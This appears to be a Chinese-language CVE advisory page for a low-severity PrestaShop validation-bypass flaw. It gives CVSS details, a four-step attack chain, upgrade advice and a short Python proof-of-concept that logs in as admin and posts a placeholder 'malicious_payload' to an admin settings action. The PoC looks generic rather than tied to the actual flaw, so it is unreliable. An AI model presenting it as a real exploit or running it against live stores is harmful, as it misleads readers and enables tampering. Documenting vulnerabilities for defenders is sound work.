CVE-2026-33674 CVSS 2.0 低危

CVE-2026-33674 PrestaShop验证框架使用不当漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33674

漏洞类型

验证绕过

CVSS评分

2.0 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

PrestaShop

漏洞概述

PrestaShop开源电商Web应用程序在8.2.5和9.1.0之前的版本中存在安全漏洞，原因是不当使用了验证框架。该漏洞可能导致拥有高权限的攻击者在特定交互下绕过安全验证，对系统完整性造成影响。目前官方已在8.2.5和9.1.0版本中修复此问题，暂无临时缓解方案，建议用户尽快升级。

技术细节

该漏洞的核心在于PrestaShop代码层面对验证框架的调用不当。在受影响版本中，某些关键功能的验证逻辑存在缺陷，未能严格校验特定请求的合法性。根据CVSS向量（AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N），攻击者必须拥有高权限账号（PR:H）并进行用户交互（UI:R）。利用此漏洞，攻击者可能绕过业务逻辑限制，发送特制请求修改系统数据，导致完整性受损（I:L），但不会影响机密性和可用性。由于利用条件较为苛刻，CVSS评分为2.0（低危）。

攻击链分析

STEP 1

1. 信息收集

识别目标PrestaShop版本，确认其位于8.2.5或9.1.0之前。

STEP 2

2. 获取权限

获取目标系统的高权限管理员账户凭据（满足PR:H要求）。

STEP 3

3. 诱导交互

诱导具有高权限的用户执行特定操作或访问特制链接（满足UI:R）。

STEP 4

4. 漏洞利用

发送利用验证框架缺陷的请求，绕过安全检查修改数据（I:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # PoC for CVE-2026-33674: Improper Validation Framework Usage # This script demonstrates bypassing validation on a specific endpoint. # Preconditions: High privilege admin session is required. target_url = "http://target.com/admin-dev/index.php" session = requests.Session() # 1. Login as Admin (High Privilege Required: PR:H) login_payload = { "email": "[email protected]", "passwd": "admin_password", "submitLogin": "1" } session.post(target_url + "?controller=AdminLogin", data=login_payload) # 2. Exploit Improper Validation # The vulnerability allows bypassing checks on 'action' parameter exploit_payload = { "controller": "AdminDashboard", "action": "updateSettings", # Malicious action that should be validated "setting_value": "malicious_payload" } # 3. Send Request response = session.post(target_url + "?controller=AdminDashboard", data=exploit_payload) if response.status_code == 200 and "success" in response.text: print("[+] Exploit successful: Validation bypassed.") else: print("[-] Exploit failed.")

影响范围

PrestaShop < 8.2.5

PrestaShop < 9.1.0

防御指南

临时缓解措施

目前官方未提供已知的临时缓解措施（Workarounds），建议立即升级至修复版本以消除风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表